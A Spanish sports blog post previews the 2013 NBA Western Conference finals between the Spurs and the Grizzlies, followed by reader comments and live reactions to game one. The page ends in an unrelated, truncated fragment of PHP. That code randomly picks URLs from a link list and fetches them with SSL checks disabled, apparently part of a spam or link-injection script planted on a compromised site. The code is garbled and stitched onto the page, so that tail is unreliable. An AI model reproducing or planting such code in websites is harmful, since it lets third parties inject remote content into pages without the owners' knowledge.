Previa San Antonio Spurs – Memphis Grizzlies

19 de May de 2013 por MagicJohnson32

Los Memphis Grizzlies disputarán las finales de la Conferencia Oeste. Los Grizzlies, insisto, aquel equipo que hace apenas un lustro sufría para alcanzar las 20 victorias y que regalaba a Pau Gasol, de largo su mejor jugador en aquella época. O eso pensábamos que hacía porque, como consecuencia directa de aquel movimiento y de los que le siguieron, la franquicia de Tennessee ha levantado la actual plantilla, una fija en los Playoffs y que este año ha llegado a cotas jamás logradas antes por los Grizzlies: 56 victorias en regular season y estas finales del Oeste que arrancarán el domingo.

En el rincón opuesto del cuadrilátero aguarda un auténtico peso pesado, los Spurs, que en los 15 años transcurridos de ‘era Duncan’ no se han perdido una sola postemporada, han ganado 4 anillos y disputarán las que serán sus octavas finales de conferencia. De hecho, la historia de los Grizzlies en los Playoffs está íntimamente vinculada a los Spurs: ante ellos debutaron en las eliminatorias por el título, con el 0-4 encajado en 2004, con Pau Gasol en pista y Hubie Brown en el banquillo, y ante ellos obtuvieron su primera victoria tanto en un partido como en una serie, en el sorprendente 4-2 logrado por los discípulos de Lionel Hollins en 2011.

El trayecto de unos y otros hasta este punto es bien diferente. Los Spurs arrasaron a los lisiados Lakers en primera ronda y se vieron mucho más exigidos en segunda ante los Warriors, ante quienes necesitaron una remontada milagrosa en el primer encuentro y los ajustes tácticos de Popovich para desactivar a Cury & Thompson conforme la serie avanzaba. Por el contrario, los Grizzlies se vieron en problemas de inicio, con el 0-2 que recibieron en los primeros encuentros ante los Clippers en L.A., y desde entonces han ganado ocho partidos de los nueve disputados empleando con éxito su fórmula habitual tanto frente a los angelinos como ante los Oklahoma City Thunder.

Claves de la eliminatoria:

Marc & Z-Bo vs Duncan ¿& Splitter?: Tim Duncan sabe lo que le espera ante los Grizzlies. “It’s not going to be pretty”, ha pronosticado el #21. Efectivamente, que nadie espere un festival de puntos y mates espectaculares. Sin embargo, la batalla en la pintura entre estos dos equipos será una de las cosas más hermosas que se pueden contemplar en el baloncesto actual. Duncan, quien vive su 174ª juventud, afronta un reto mayúsculo ante Marc Gasol y Zach Randolph, la pareja interior más determinante en estos Playoffs. El de los Spurs ha rendido de manera excelente en los tres enfrentamientos que ha disputado esta temporada contra Memphis, en los que ha promediado casi 20 puntos, 13 rebotes, 4 asistencias y 3 tapones. En esta ocasión necesitará una contribución sólida de Splitter tanto en ataque, para evitar que la defensa se cierre demasiado sobre él, como atrás, para frenar en lo posible la doble amenaza interior Grizzly.

– La partida de ajedrez: Ni Clippers ni Thunder fueron capaces de descifrar la manera de jugarle a estos Grizzlies, que llevaron siempre los partidos al terreno que les resultaba más favorable. Pero reconozcámoslo: Vinny Del Negro y Scott Brooks no son unos genios tácticos, por así decirlo. Esta vez, en el banquillo contrario se sentará Gregg Popovich, maestro en los ajustes entre partidos, en lograr que su equipo resulte competitivo bajo cualquier circunstancia. Especialmente interesantes resultarán las variantes en las asignaciones defensivas (Tony Allen sobre Parker, Leonard con Conley, Marc con Duncan…) y cómo sepan explotar unos y otros los desequilibrios que se generen.

– Producción exterior: Dado lo que implica tener a Duncan y Gasol patrullando las zonas, la anotación exterior va a ser oro. Los Spurs van servidos con Parker, Ginóbili, Green, Leonard y Green (incluso Bonner y Diaw) pero ¿y los Grizzlies? Conley está anotando mucho más desde la marcha de Gay y promedia 17,6 puntos en Playoffs, aunque a costa de una severa caída en los porcentajes. Bayless, Allen, Prince y Pondexter son cualquier cosa menos fiables, pero Hollins va a necesitar de ellos una producción sólida para que Gasol y Randolph no tengan que cargar con toda la responsabilidad anotadora. Por aquí se le puede escapar la serie a Memphis.

Pronóstico: Será una serie larga y equilibrada. 4-3 para Spurs.

Comenta

23 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Muchísimas ganas de ver cómo se emparejan los jugadores y a partir de ahí ver cómo se desarrolla la serie.Los Spurs tienen más tablas pero los Grizzlies tienen mejores condiciones físicas,¿el protagonista de la serie será un actor secundario?

      Citar

  2. Sancho88 dice:
    #2

    También será importante el tema de las faltas. Como bien dices, va a ser una partida de ajedrez, y seguro que Spurs quieren sacar faltas a Gasol y Grizzlies a Duncan, porque ellos son los líderes defensivos. A partir de ahí, va a ser una serie muy pegajosa como dice Duncan, muchas faltas, contacto físico y tal, pero joder, qué queremos, son finales de conferencia. I WANT SOME NASTY!! jejeje, que diría el awelete Popo. Yo digo que pasan los Grizzlies en 6 juegos. 2-4.

    Y Marc Gasol como factor clave. Realmente va a tener que trabajar como un chino tanto en el poste alto como en el poste bajo, y de sus bloqueos sobre Leonard que estará como un perro de presa encima de Conley, dependerán grandes opciones de Grizzlies. Los Spurs tienen que estar a tope en las líneas de pase de Memphis, y, sobre todo, controlar el rebote defensivo e intentar correr. En estático a Grizzlies solo les paras cortando líneas de pase con Green y Leonard, y en transición corriendo más que ellos, ya que no es su principal virtud ser un equipo veloz en transición a la defensa, así que Parker tiene que imprimir ritmo. Spurs no se pueden quedar dormidos como les pasó el año pasado contra Oklahoma. Ritmo ofensivo y manos rápidas atrás. Son sus opciones

      Citar

  3. jas dice:
    #3

    Los Spurs tienen mucho mas potencial exterior en cuanto a ataque se refiere, pero no hay que olvidar que los Grizzlies tienen una gran defensa exterior con Conley, Prince y Allen, y el principal activo de san antonio en ataque que es Parker vive casi en exclusiva de sus pentetraciones a canasta, donde la zona de los Grizzlies es de las más seguras de la competición. Va a ser muy bonito ver como se ajustan los ataques y defensas en esta serie. Creo que Memphis es el equipo al que más complicado tienen para meterle mano estos Spurs.

      Citar

  4. maravich dice:
    #4

    Pues yo a medida que se acerca el primer partido veo cada vez más claro que SAS pueden ganar en 5 ó 6 partidos, y hace unos días no lo veía tan claro.
    Si piensas en los duelos individuales , creo que pueden salir ganando los Spurs. No tengo claro como se dice que Tony Allen vaya a defender siempre que esté en cancha a Tony Parker, más que nada porque no veo a Conley defendiendo muchos minutos a Danny Green o sobre todo Ginóbili… es un gran defensor en anticipación pero no tanto en 1×1 contra gente de ese tipo y que le sacan además 10 cms… No lo veo claro.
    Pero la clave coincido estará en el juego interior. Puede ser cfundamental que Darrell Arthur esté a su mejor nivel orqpue el desgaste que van a tener Z-Bo y Marc va a ser fuerte, y Pops intentará cargar el juego desde el principio para que: secarguen de faltas.
    Si te fijas en las estadísticas en los 4 partidos de temporada regular (2-2, partidos muy duros y competidos), Randolph y Marc no han hecho grandes números, por debajo de lo normal. Aunque está claro q que los Playoff son otra historia…
    Espero que gane hoy San Antonio… he apostado por ellos a partido ganado… aunque me gustaría que ganasen los Grizz… complicado con la experiencia de la 1* ronda de hace dos años…

      Citar

  5. L.Casei dice:
    #5

    Si como dice Ruxixón el factor clave puede ser un secundario, ahí puede entrar en juego Kawhi Leonard, un jugador que no para de crecer y que puede volver loco a Prince o Pondexter…
    Pero esta es una serie de la verdad, dos de los mejores equipos en defensa de la Liga con dos d de los mejores entrenadores de la NBA, sin discusión.
    No, no va a ser una eliminatoria bonita de ver, pero a quien le guste esto va a disfrutar, sin duda. Yo veo difícil que lleguen a los 100 puntos ningún equipo en ninguno de los partidos.
    Para mí, favoritos los Spurs pero una serie larga… Pops no se dejará sorprender de nuevo…

      Citar

  6. nba dice:
    #6

    todo dependera de si consiguen sentar mucho tiempo a Marc en el banquillo por problemas de faltas

      Citar

  7. Jose Luis dice:
    #7

    No le pitan falta a Duncan ni vamos… debería llevar 3 o 4 ya.

      Citar

  8. Jose Luis dice:
    #8

    Memphis ha empezado mal en ataque, y a los Spurs le entra prácticamente todo.

      Citar

  9. Jose Luis dice:
    #9

    Offensive foul de Arthur… creo que fue el propio defensor de Arthur quien tiró a Ginóbili al suelo. 3 pérdidas Memphis, y claro, offensive foul de Spurs para compensar…

      Citar

  10. Denise dice:
    #10

    Y Bonner que no deja de dar por culo con sus triples…

    En verdad, los Spurs se están comiendo a los Grizzlies…de momento.

    Por fin Hollins le da minutos a Davis.
    Y tremendos los playoffs de Parker. La verdad es que si los Spurs tuvieran un Center en condiciones que ayude a Duncan y no al paquete de Splitter, ahora mismo los vería hasta capaces de ganar el anillo. Aun pienso que Memphis se llevará la eliminatoria.

      Citar

  11. Sancho88 dice:
    #11

    Pues Bonner lo está haciendo bien en ataque y en defensa. No sé cómo todavía no le han parado esos triples. A ver en el descanso qué planean, pero no le pueden dejar tirar desde ahí porque las va a meter todas. Conley anda muy perdidico el hombre… un poco revolucionado por la situación. A ver si se calma y juega como sabe

      Citar

  12. Denise dice:
    #12

    La verdad es que no me esperaba un primer partido tan comodo para SAS.

      Citar

  13. Denise dice:
    #13

    Pondexter!!! 2 triples consecutivos y a 8.

      Citar

  14. Denise dice:
    #14

    Buenoooo, partido comodisimo hasta el momento para Spurs y 30 segundos, 2 triples de Pondexter y un mate de Bayless ponen a los Grizzlies a 6.

      Citar

  15. Sancho88 dice:
    #15

    Lo apuntamos de sorpresa en la otra eliminatoria… pero cada vez menos sorpresa. Pondexter 4/6 en triples, pero lo flipante es que sólo él ha tirado de triple esta noche en Memphis… esta estadística y0o no sé si ha ocurrido antes.
    67% de Pondexter la criatura…

      Citar

  16. Denise dice:
    #16

    Sancho88:
    Lo apuntamos de sorpresa en la otra eliminatoria… pero cada vez menos sorpresa. Pondexter 4/6 en triples, pero lo flipante es que sólo él ha tirado de triple esta noche en Memphis… esta estadística y0o no sé si ha ocurrido antes.
    67% de Pondexter la criatura…

    Bueno, Bayless se ha tirado ante un triple que ha fallado y que podía haber puesto a Memphis a 3.

    Ahora se ha vuelto a escapar los Spurs de la mano de Ginobili.

      Citar

  17. Denise dice:
    #17

    ¿Quien es este Wroten de Memphis? Wroten no es un bajista…xD

      Citar

  18. Sancho88 dice:
    #18

    Otro base más de la factoría Hollins. Selby, Pargo… no le darán bola y el año que viene tampoco. A los Grizzlies les hace falta otro hombre pequeño, van limitados ahí…

      Citar

  19. Denise dice:
    #19

    Lo que no entiendo es por qué si Randolph no está haciendo absolutamente nada, Hollins lo mantiene en pista
    Joder, dale minutos a Ed Davis, los Grizzlies están jugando con solo 4 jugadores cuando Z-Bo está en pista.

      Citar

  20. Sancho88 dice:
    #20

    Davis no se entiende como no tiene minutos… incomprensible ver a Arthur estando Davis. Y después el backourt es mediocre no me jodas…

      Citar

  21. Denise dice:
    #21

    Bueno pues 21 arriba para Spurs a falta de 9 minutos. Ya paso de ver los minutos de la basura.
    Hollins entiende de basket mas que yo, pero creo que ha planteado mal el partido. En especial, muchos minutos para Z-Bo que no ha hecho nada,
    Hasta mañana.

      Citar

  22. rumbero dice:
    #22

    Parker está jugando unos PO de MVP. Amo y señor. Y muy fan de la parejita Leonard – Green.
    Aun así creo que es dificil que veamos a unos Spurs tirando tan bien y tan cómodos (a pesar del susto que les hayan podido meter los osos). Randolph ya estas espavilando!

      Citar

  23. GreenPride dice:
    #23

    Series de lo más interesantes las que van a disputar en las finales de conferencia los Spurs y los Grizzlies que harán juego con dos estilos totalmente diferentes.
    Los Grizzlies va a ver probada su gran defensa con uno de los mejores equipos ofensivos de los últimos años. Ahora ya no podrán centrarse en ayudar sobre una estrella rival esperando que al resto les pueda la presión de los playoffs sino que deberán hacer una gran defensa global sobre un equipo de San Antonio en el que todos lanzan y anotan sabiendo perfectamente su rol y buscando siempre un pase más que de tiros más comodos. Aquí estará una de las primeras claves. La defensa Grizzlie debe ser capaz de parar el movimiento de bola de los Spurs que suele empezar con un bloqueo sobre Parker o Ginobilli para crear desde los espacios que se saquen de ahí. La otra opción ofensiva suele ser Duncan en 1×1 en ataque pero esta debe estar bien cubierta por el defensor del año, nuestro Marc Gasol. Los Grizzlies deberán estar muy encima de las líneas de pase intentando no dejar fluir el basket de pase de los Spurs y que éstos no tengan tiros cómodos.
    Por otro lado, los Grizzlies en ataque deben intentar hacer valer una vez más su baloncesto inside-out con el dúo Marc&Zach dominando las zonas y aprovechando los huecos que dejen los Spurs en sus dobles marcajes a los interiores de Memphis. Clave en la serie el rendimiento de los exteriores de Memphis, tanto de Conley en la dirección, anotación y defensa de Parker como de Allen, Prince, Podexter o Bayless que deberán aprovechar la atención interior que reciban sus torres para anotar y así descargar algo a sus dos interiores.
    Creo que la serie será dura pero veo a los Spurs con más armas ofensivas tanto individuales como de grupo y creo que esta vez Memphis no va a poder jugar a 80 y tantos puntos los partidos suficientes como para llevarse las series. Además creo que esta vez Marc&Zach no van a dominar las pinturas tan fácilmente como en anteriores series, lo que supondría un lastre enorme en un equipo que no anda sobrado de anotadores exteriores.
    Pronóstico: 4-2 Spurs

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>